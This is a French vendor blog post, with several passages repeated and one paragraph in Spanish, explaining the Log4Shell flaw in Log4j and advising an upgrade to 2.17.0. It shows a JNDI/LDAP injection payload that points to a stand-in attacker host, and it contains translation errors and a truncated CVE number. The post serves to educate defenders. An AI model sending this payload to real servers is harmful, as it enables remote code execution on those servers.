Icônes SCW
héros bg sans séparateur
Blog

Explication de la vulnérabilité Log4j : son vecteur d'attaque et comment la prévenir

Laura Verheyde
Publié le 16 janvier 2022
Dernière mise à jour le 6 mars 2026

Le 9 décembre, une faille de sécurité de type « zero-day » a été découverte dans la bibliothèque Java Log4j. CVE-44228, également appelée Log4Shell, a été classée comme « très grave », car cette faille peut entraîner l'exécution de code à distance (RAZA). De plus, log4j-core est l'une des bibliothèques de journalisation Java les plus utilisées, ce qui expose des millions d'applications à des risques.

Souhaitez-vous améliorer rapidement vos compétences pour aborder Log4Shell ?

Nous avons créé une vitrine qui vous présente l'idée de base de Log4Shell et vous permet de découvrir comment cette vulnérabilité est exploitée dans un simulateur appelé Mission. Dans cette mission, nous vous montrerons comment la vulnérabilité de Log4j peut affecter votre infrastructure et vos applications. Veuillez cliquer ici pour accéder directement à la vitrine, ou continuer votre lecture pour obtenir plus d'informations détaillées sur la vulnérabilité.

Anciennes actualités ?

L'exploit n'est pas nouveau. Lors de leur présentation à BlackHat en 2016, les chercheurs en sécurité Álvaro Muñoz et Oleksandr Mirosh ont souligné que «les applications ne doivent pas effectuer de recherches JNDI avec des données non fiables »et ont illustré comment une injection JNDI/LDAP spécifique pouvait entraîner l'exécution de code à distance. C'est précisément ce qui constitue l'essence même de Log4Shell.

Vecteur d'attaque

La charge utile d'injection de Log4Shell se présente comme suit :

$ {jndi:ldap: //attacker.host/xyz}

Para entender esto necesitamos conocer el lenguaje de expresión (EL) de Java. Expresiones escritas en la siguiente sintaxis: $ {expr} se evaluará en tiempo de ejecución. Por ejemplo, $ {java:version} devolverá la versión de Java que se está utilizando.

Ensuite, il y a JNDI, ou Java Names and Directory Interface, qui est une API permettant de se connecter à des services via des protocoles tels que LDAP, DNS, RMI, etc. afin de récupérer des données ou des ressources. En résumé, dans l'exemple précédent concernant les charges malveillantes, JNDI effectue une recherche sur le serveur LDAP contrôlé par l'attaquant. Sa réponse pourrait, par exemple, pointer vers un fichier de classe Java contenant du code malveillant, qui sera ensuite exécuté sur le serveur vulnérable.

Ce qui rend cette vulnérabilité si problématique, c'est que Log4j évalue toutes les entrées de journalisation et effectuera des recherches sur toutes les entrées des utilisateurs enregistrés écrites dans la syntaxe EL avec le préfixe « jndi ». La charge utile peut être insérée à n'importe quel endroit où les utilisateurs peuvent saisir des données, comme les champs de formulaire. De plus, les en-têtes HTTP, tels que User-Agent et X-Forwarded-For, ainsi que d'autres en-têtes, peuvent être personnalisés pour transporter la charge utile.

Pour tester vous-même l'exploit, veuillez vous rendre sur notre présentation et passer à l'étape 2 : « Impact de l'expérience ».

Prévention : Sensibilisation

La mise à jour est recommandée pour toutes les applications, car Log4j a corrigé le code vulnérable. Cependant, les versions 2.15.0 et 2.16.0 contenaient une attaque DDoS et d'autres vulnérabilités, ce qui signifie qu'à la fin du mois de décembre, il est conseillé de passer à la version 2.17.0.

En tant que développeurs qui écrivent du code, nous devons toujours garder à l'esprit la sécurité. Log4Shell nous a démontré que l'utilisation de frameworks ou de bibliothèques tiers comporte des risques. Nous devons être conscients du fait que la sécurité de notre application peut être compromise si nous utilisons des sources externes que nous supposons naïvement sûres.

Cette vulnérabilité aurait-elle pu être évitée ? Oui et non. D'une part, les développeurs ne peuvent pas faire grand-chose si les composants vulnérables sont introduits par des logiciels tiers. D'autre part, la leçon à tirer de cette expérience est une leçon qui a été répétée à maintes reprises, à savoir qu'il ne faut jamais se fier aux avis des utilisateurs.

Secure Code Warrior que les développeurs soucieux de la sécurité constituent le meilleur moyen d'éviter les vulnérabilités dans le code. SCW proposant une formation évolutive et spécifique au cadre de programmation, les entreprises clientes ont pu rapidement identifier les développeurs Java concernés à l'aide des données contenues dans les rapports. Elles ont également fait appel à leurs experts en sécurité formés par SCW pour accélérer la mise à jour de Log4j.

Pour les développeurs Java en particulier, Secure Code Warrior Sensei, un complément IntelliJ gratuit. Cet outil d'analyse de code basé sur des règles peut être utilisé pour faire respecter les directives de codage et prévenir et corriger les vulnérabilités. Vous pouvez créer vos propres règles ou utiliser nos livres de recettes prêts à l'emploi. Veuillez consulter nos recettes et n'oubliez pas de télécharger notre livre de recettes Log4j, qui vous aidera à localiser et à corriger la vulnérabilité Log4Shell en un rien de temps.

Améliorez vos compétences en vous protégeant contre Log4Shell.

Souhaitez-vous mettre en pratique ce que vous avez appris dans cet article de blog ? Notre vitrine peut vous aider. Au début de la présentation, nous ferons un rapide tour d'horizon de cette vulnérabilité, puis nous accéderons à un environnement simulé dans lequel vous pourrez tester l'exploit en suivant des instructions guidées.


Veuillez consulter la ressource
Veuillez consulter la ressource

En décembre 2021, une faille de sécurité critique, Log4Shell, a été découverte dans la bibliothèque Java Log4j. Dans cet article, nous expliquons la faille Log4Shell de la manière la plus simple possible afin que vous en compreniez les bases et vous proposons une mission : un terrain de jeu sur lequel vous pouvez tenter d'exploiter un site web simulé en utilisant vos connaissances sur cette faille.

Souhaitez-vous en savoir davantage ?

En savoir plus

Secure Code Warrior là pour aider votre organisation à protéger le code tout au long du cycle de vie du développement logiciel et à créer une culture où la cybersécurité est une priorité. Que vous soyez administrateur AppSec, développeur, CISO ou toute autre personne impliquée dans la sécurité, nous pouvons aider votre organisation à réduire les risques associés à un code non sécurisé.

Veuillez réserver une démonstration.
Partager sur :
marques LinkedInSocialLogo x
auteur
Laura Verheyde
Publié le 16 janvier 2022

Laura Verheyde est développeuse de logiciels à l'adresse Secure Code Warrior . Elle se consacre à la recherche de vulnérabilités et à la création de contenu pour Missions et Coding labs.

Partager sur :
marques LinkedInSocialLogo x

Le 9 décembre, une faille de sécurité de type « zero-day » a été découverte dans la bibliothèque Java Log4j. CVE-44228, également appelée Log4Shell, a été classée comme « très grave », car cette faille peut entraîner l'exécution de code à distance (RAZA). De plus, log4j-core est l'une des bibliothèques de journalisation Java les plus utilisées, ce qui expose des millions d'applications à des risques.

Souhaitez-vous améliorer rapidement vos compétences pour aborder Log4Shell ?

Nous avons créé une vitrine qui vous présente l'idée de base de Log4Shell et vous permet de découvrir comment cette vulnérabilité est exploitée dans un simulateur appelé Mission. Dans cette mission, nous vous montrerons comment la vulnérabilité de Log4j peut affecter votre infrastructure et vos applications. Veuillez cliquer ici pour accéder directement à la vitrine, ou continuer votre lecture pour obtenir plus d'informations détaillées sur la vulnérabilité.

Anciennes actualités ?

L'exploit n'est pas nouveau. Lors de leur présentation à BlackHat en 2016, les chercheurs en sécurité Álvaro Muñoz et Oleksandr Mirosh ont souligné que «les applications ne doivent pas effectuer de recherches JNDI avec des données non fiables »et ont illustré comment une injection JNDI/LDAP spécifique pouvait entraîner l'exécution de code à distance. C'est précisément ce qui constitue l'essence même de Log4Shell.

Vecteur d'attaque

La charge utile d'injection de Log4Shell se présente comme suit :

$ {jndi:ldap: //attacker.host/xyz}

Para entender esto necesitamos conocer el lenguaje de expresión (EL) de Java. Expresiones escritas en la siguiente sintaxis: $ {expr} se evaluará en tiempo de ejecución. Por ejemplo, $ {java:version} devolverá la versión de Java que se está utilizando.

Ensuite, il y a JNDI, ou Java Names and Directory Interface, qui est une API permettant de se connecter à des services via des protocoles tels que LDAP, DNS, RMI, etc. afin de récupérer des données ou des ressources. En résumé, dans l'exemple précédent concernant les charges malveillantes, JNDI effectue une recherche sur le serveur LDAP contrôlé par l'attaquant. Sa réponse pourrait, par exemple, pointer vers un fichier de classe Java contenant du code malveillant, qui sera ensuite exécuté sur le serveur vulnérable.

Ce qui rend cette vulnérabilité si problématique, c'est que Log4j évalue toutes les entrées de journalisation et effectuera des recherches sur toutes les entrées des utilisateurs enregistrés écrites dans la syntaxe EL avec le préfixe « jndi ». La charge utile peut être insérée à n'importe quel endroit où les utilisateurs peuvent saisir des données, comme les champs de formulaire. De plus, les en-têtes HTTP, tels que User-Agent et X-Forwarded-For, ainsi que d'autres en-têtes, peuvent être personnalisés pour transporter la charge utile.

Pour tester vous-même l'exploit, veuillez vous rendre sur notre présentation et passer à l'étape 2 : « Impact de l'expérience ».

Prévention : Sensibilisation

La mise à jour est recommandée pour toutes les applications, car Log4j a corrigé le code vulnérable. Cependant, les versions 2.15.0 et 2.16.0 contenaient une attaque DDoS et d'autres vulnérabilités, ce qui signifie qu'à la fin du mois de décembre, il est conseillé de passer à la version 2.17.0.

En tant que développeurs qui écrivent du code, nous devons toujours garder à l'esprit la sécurité. Log4Shell nous a démontré que l'utilisation de frameworks ou de bibliothèques tiers comporte des risques. Nous devons être conscients du fait que la sécurité de notre application peut être compromise si nous utilisons des sources externes que nous supposons naïvement sûres.

Cette vulnérabilité aurait-elle pu être évitée ? Oui et non. D'une part, les développeurs ne peuvent pas faire grand-chose si les composants vulnérables sont introduits par des logiciels tiers. D'autre part, la leçon à tirer de cette expérience est une leçon qui a été répétée à maintes reprises, à savoir qu'il ne faut jamais se fier aux avis des utilisateurs.

Secure Code Warrior que les développeurs soucieux de la sécurité constituent le meilleur moyen d'éviter les vulnérabilités dans le code. SCW proposant une formation évolutive et spécifique au cadre de programmation, les entreprises clientes ont pu rapidement identifier les développeurs Java concernés à l'aide des données contenues dans les rapports. Elles ont également fait appel à leurs experts en sécurité formés par SCW pour accélérer la mise à jour de Log4j.

Pour les développeurs Java en particulier, Secure Code Warrior Sensei, un complément IntelliJ gratuit. Cet outil d'analyse de code basé sur des règles peut être utilisé pour faire respecter les directives de codage et prévenir et corriger les vulnérabilités. Vous pouvez créer vos propres règles ou utiliser nos livres de recettes prêts à l'emploi. Veuillez consulter nos recettes et n'oubliez pas de télécharger notre livre de recettes Log4j, qui vous aidera à localiser et à corriger la vulnérabilité Log4Shell en un rien de temps.

Améliorez vos compétences en vous protégeant contre Log4Shell.

Souhaitez-vous mettre en pratique ce que vous avez appris dans cet article de blog ? Notre vitrine peut vous aider. Au début de la présentation, nous ferons un rapide tour d'horizon de cette vulnérabilité, puis nous accéderons à un environnement simulé dans lequel vous pourrez tester l'exploit en suivant des instructions guidées.


Veuillez consulter la ressource
Veuillez consulter la ressource

Veuillez remplir le formulaire suivant pour télécharger le rapport.

Nous souhaiterions obtenir votre autorisation pour vous envoyer des informations sur nos produits ou sur des sujets liés au codage sécurisé. Nous traiterons toujours vos données personnelles avec le plus grand soin et ne les vendrons jamais à d'autres entreprises à des fins de marketing.

Envoyer
icône de réussite scw
icône d'erreur scw
Pour envoyer le formulaire, veuillez activer les cookies « d'analyse ». N'hésitez pas à les désactiver à nouveau une fois que vous avez terminé.

Le 9 décembre, une faille de sécurité de type « zero-day » a été découverte dans la bibliothèque Java Log4j. CVE-44228, également appelée Log4Shell, a été classée comme « très grave », car cette faille peut entraîner l'exécution de code à distance (RAZA). De plus, log4j-core est l'une des bibliothèques de journalisation Java les plus utilisées, ce qui expose des millions d'applications à des risques.

Souhaitez-vous améliorer rapidement vos compétences pour aborder Log4Shell ?

Nous avons créé une vitrine qui vous présente l'idée de base de Log4Shell et vous permet de découvrir comment cette vulnérabilité est exploitée dans un simulateur appelé Mission. Dans cette mission, nous vous montrerons comment la vulnérabilité de Log4j peut affecter votre infrastructure et vos applications. Veuillez cliquer ici pour accéder directement à la vitrine, ou continuer votre lecture pour obtenir plus d'informations détaillées sur la vulnérabilité.

Anciennes actualités ?

L'exploit n'est pas nouveau. Lors de leur présentation à BlackHat en 2016, les chercheurs en sécurité Álvaro Muñoz et Oleksandr Mirosh ont souligné que «les applications ne doivent pas effectuer de recherches JNDI avec des données non fiables »et ont illustré comment une injection JNDI/LDAP spécifique pouvait entraîner l'exécution de code à distance. C'est précisément ce qui constitue l'essence même de Log4Shell.

Vecteur d'attaque

La charge utile d'injection de Log4Shell se présente comme suit :

$ {jndi:ldap: //attacker.host/xyz}

Para entender esto necesitamos conocer el lenguaje de expresión (EL) de Java. Expresiones escritas en la siguiente sintaxis: $ {expr} se evaluará en tiempo de ejecución. Por ejemplo, $ {java:version} devolverá la versión de Java que se está utilizando.

Ensuite, il y a JNDI, ou Java Names and Directory Interface, qui est une API permettant de se connecter à des services via des protocoles tels que LDAP, DNS, RMI, etc. afin de récupérer des données ou des ressources. En résumé, dans l'exemple précédent concernant les charges malveillantes, JNDI effectue une recherche sur le serveur LDAP contrôlé par l'attaquant. Sa réponse pourrait, par exemple, pointer vers un fichier de classe Java contenant du code malveillant, qui sera ensuite exécuté sur le serveur vulnérable.

Ce qui rend cette vulnérabilité si problématique, c'est que Log4j évalue toutes les entrées de journalisation et effectuera des recherches sur toutes les entrées des utilisateurs enregistrés écrites dans la syntaxe EL avec le préfixe « jndi ». La charge utile peut être insérée à n'importe quel endroit où les utilisateurs peuvent saisir des données, comme les champs de formulaire. De plus, les en-têtes HTTP, tels que User-Agent et X-Forwarded-For, ainsi que d'autres en-têtes, peuvent être personnalisés pour transporter la charge utile.

Pour tester vous-même l'exploit, veuillez vous rendre sur notre présentation et passer à l'étape 2 : « Impact de l'expérience ».

Prévention : Sensibilisation

La mise à jour est recommandée pour toutes les applications, car Log4j a corrigé le code vulnérable. Cependant, les versions 2.15.0 et 2.16.0 contenaient une attaque DDoS et d'autres vulnérabilités, ce qui signifie qu'à la fin du mois de décembre, il est conseillé de passer à la version 2.17.0.

En tant que développeurs qui écrivent du code, nous devons toujours garder à l'esprit la sécurité. Log4Shell nous a démontré que l'utilisation de frameworks ou de bibliothèques tiers comporte des risques. Nous devons être conscients du fait que la sécurité de notre application peut être compromise si nous utilisons des sources externes que nous supposons naïvement sûres.

Cette vulnérabilité aurait-elle pu être évitée ? Oui et non. D'une part, les développeurs ne peuvent pas faire grand-chose si les composants vulnérables sont introduits par des logiciels tiers. D'autre part, la leçon à tirer de cette expérience est une leçon qui a été répétée à maintes reprises, à savoir qu'il ne faut jamais se fier aux avis des utilisateurs.

Secure Code Warrior que les développeurs soucieux de la sécurité constituent le meilleur moyen d'éviter les vulnérabilités dans le code. SCW proposant une formation évolutive et spécifique au cadre de programmation, les entreprises clientes ont pu rapidement identifier les développeurs Java concernés à l'aide des données contenues dans les rapports. Elles ont également fait appel à leurs experts en sécurité formés par SCW pour accélérer la mise à jour de Log4j.

Pour les développeurs Java en particulier, Secure Code Warrior Sensei, un complément IntelliJ gratuit. Cet outil d'analyse de code basé sur des règles peut être utilisé pour faire respecter les directives de codage et prévenir et corriger les vulnérabilités. Vous pouvez créer vos propres règles ou utiliser nos livres de recettes prêts à l'emploi. Veuillez consulter nos recettes et n'oubliez pas de télécharger notre livre de recettes Log4j, qui vous aidera à localiser et à corriger la vulnérabilité Log4Shell en un rien de temps.

Améliorez vos compétences en vous protégeant contre Log4Shell.

Souhaitez-vous mettre en pratique ce que vous avez appris dans cet article de blog ? Notre vitrine peut vous aider. Au début de la présentation, nous ferons un rapide tour d'horizon de cette vulnérabilité, puis nous accéderons à un environnement simulé dans lequel vous pourrez tester l'exploit en suivant des instructions guidées.


Veuillez consulter le webinaire
Commencer
En savoir plus

Veuillez cliquer sur le lien ci-dessous et télécharger le PDF de cette ressource.

Secure Code Warrior là pour aider votre organisation à protéger le code tout au long du cycle de vie du développement logiciel et à créer une culture où la cybersécurité est une priorité. Que vous soyez administrateur AppSec, développeur, CISO ou toute autre personne impliquée dans la sécurité, nous pouvons aider votre organisation à réduire les risques associés à un code non sécurisé.

Veuillez consulter le rapportVeuillez réserver une démonstration.
Télécharger le PDF
Veuillez consulter la ressource
Partager sur :
marques LinkedInSocialLogo x
Souhaitez-vous en savoir davantage ?

Partager sur :
marques LinkedInSocialLogo x
auteur
Laura Verheyde
Publié le 16 janvier 2022

Laura Verheyde est développeuse de logiciels à l'adresse Secure Code Warrior . Elle se consacre à la recherche de vulnérabilités et à la création de contenu pour Missions et Coding labs.

Partager sur :
marques LinkedInSocialLogo x

Le 9 décembre, une faille de sécurité de type « zero-day » a été découverte dans la bibliothèque Java Log4j. CVE-44228, également appelée Log4Shell, a été classée comme « très grave », car cette faille peut entraîner l'exécution de code à distance (RAZA). De plus, log4j-core est l'une des bibliothèques de journalisation Java les plus utilisées, ce qui expose des millions d'applications à des risques.

Souhaitez-vous améliorer rapidement vos compétences pour aborder Log4Shell ?

Nous avons créé une vitrine qui vous présente l'idée de base de Log4Shell et vous permet de découvrir comment cette vulnérabilité est exploitée dans un simulateur appelé Mission. Dans cette mission, nous vous montrerons comment la vulnérabilité de Log4j peut affecter votre infrastructure et vos applications. Veuillez cliquer ici pour accéder directement à la vitrine, ou continuer votre lecture pour obtenir plus d'informations détaillées sur la vulnérabilité.

Anciennes actualités ?

L'exploit n'est pas nouveau. Lors de leur présentation à BlackHat en 2016, les chercheurs en sécurité Álvaro Muñoz et Oleksandr Mirosh ont souligné que «les applications ne doivent pas effectuer de recherches JNDI avec des données non fiables »et ont illustré comment une injection JNDI/LDAP spécifique pouvait entraîner l'exécution de code à distance. C'est précisément ce qui constitue l'essence même de Log4Shell.

Vecteur d'attaque

La charge utile d'injection de Log4Shell se présente comme suit :

$ {jndi:ldap: //attacker.host/xyz}

Para entender esto necesitamos conocer el lenguaje de expresión (EL) de Java. Expresiones escritas en la siguiente sintaxis: $ {expr} se evaluará en tiempo de ejecución. Por ejemplo, $ {java:version} devolverá la versión de Java que se está utilizando.

Ensuite, il y a JNDI, ou Java Names and Directory Interface, qui est une API permettant de se connecter à des services via des protocoles tels que LDAP, DNS, RMI, etc. afin de récupérer des données ou des ressources. En résumé, dans l'exemple précédent concernant les charges malveillantes, JNDI effectue une recherche sur le serveur LDAP contrôlé par l'attaquant. Sa réponse pourrait, par exemple, pointer vers un fichier de classe Java contenant du code malveillant, qui sera ensuite exécuté sur le serveur vulnérable.

Ce qui rend cette vulnérabilité si problématique, c'est que Log4j évalue toutes les entrées de journalisation et effectuera des recherches sur toutes les entrées des utilisateurs enregistrés écrites dans la syntaxe EL avec le préfixe « jndi ». La charge utile peut être insérée à n'importe quel endroit où les utilisateurs peuvent saisir des données, comme les champs de formulaire. De plus, les en-têtes HTTP, tels que User-Agent et X-Forwarded-For, ainsi que d'autres en-têtes, peuvent être personnalisés pour transporter la charge utile.

Pour tester vous-même l'exploit, veuillez vous rendre sur notre présentation et passer à l'étape 2 : « Impact de l'expérience ».

Prévention : Sensibilisation

La mise à jour est recommandée pour toutes les applications, car Log4j a corrigé le code vulnérable. Cependant, les versions 2.15.0 et 2.16.0 contenaient une attaque DDoS et d'autres vulnérabilités, ce qui signifie qu'à la fin du mois de décembre, il est conseillé de passer à la version 2.17.0.

En tant que développeurs qui écrivent du code, nous devons toujours garder à l'esprit la sécurité. Log4Shell nous a démontré que l'utilisation de frameworks ou de bibliothèques tiers comporte des risques. Nous devons être conscients du fait que la sécurité de notre application peut être compromise si nous utilisons des sources externes que nous supposons naïvement sûres.

Cette vulnérabilité aurait-elle pu être évitée ? Oui et non. D'une part, les développeurs ne peuvent pas faire grand-chose si les composants vulnérables sont introduits par des logiciels tiers. D'autre part, la leçon à tirer de cette expérience est une leçon qui a été répétée à maintes reprises, à savoir qu'il ne faut jamais se fier aux avis des utilisateurs.

Secure Code Warrior que les développeurs soucieux de la sécurité constituent le meilleur moyen d'éviter les vulnérabilités dans le code. SCW proposant une formation évolutive et spécifique au cadre de programmation, les entreprises clientes ont pu rapidement identifier les développeurs Java concernés à l'aide des données contenues dans les rapports. Elles ont également fait appel à leurs experts en sécurité formés par SCW pour accélérer la mise à jour de Log4j.

Pour les développeurs Java en particulier, Secure Code Warrior Sensei, un complément IntelliJ gratuit. Cet outil d'analyse de code basé sur des règles peut être utilisé pour faire respecter les directives de codage et prévenir et corriger les vulnérabilités. Vous pouvez créer vos propres règles ou utiliser nos livres de recettes prêts à l'emploi. Veuillez consulter nos recettes et n'oubliez pas de télécharger notre livre de recettes Log4j, qui vous aidera à localiser et à corriger la vulnérabilité Log4Shell en un rien de temps.

Améliorez vos compétences en vous protégeant contre Log4Shell.

Souhaitez-vous mettre en pratique ce que vous avez appris dans cet article de blog ? Notre vitrine peut vous aider. Au début de la présentation, nous ferons un rapide tour d'horizon de cette vulnérabilité, puis nous accéderons à un environnement simulé dans lequel vous pourrez tester l'exploit en suivant des instructions guidées.


Table des matières

Télécharger le PDF
Veuillez consulter la ressource
Souhaitez-vous en savoir davantage ?

En savoir plus

Secure Code Warrior là pour aider votre organisation à protéger le code tout au long du cycle de vie du développement logiciel et à créer une culture où la cybersécurité est une priorité. Que vous soyez administrateur AppSec, développeur, CISO ou toute autre personne impliquée dans la sécurité, nous pouvons aider votre organisation à réduire les risques associés à un code non sécurisé.

Veuillez réserver une démonstration.Télécharger
Partager sur :
marques LinkedInSocialLogo x
Centre de ressources

Ressources pour débuter

Plus de publications
Centre de ressources

Ressources pour débuter

Plus de publications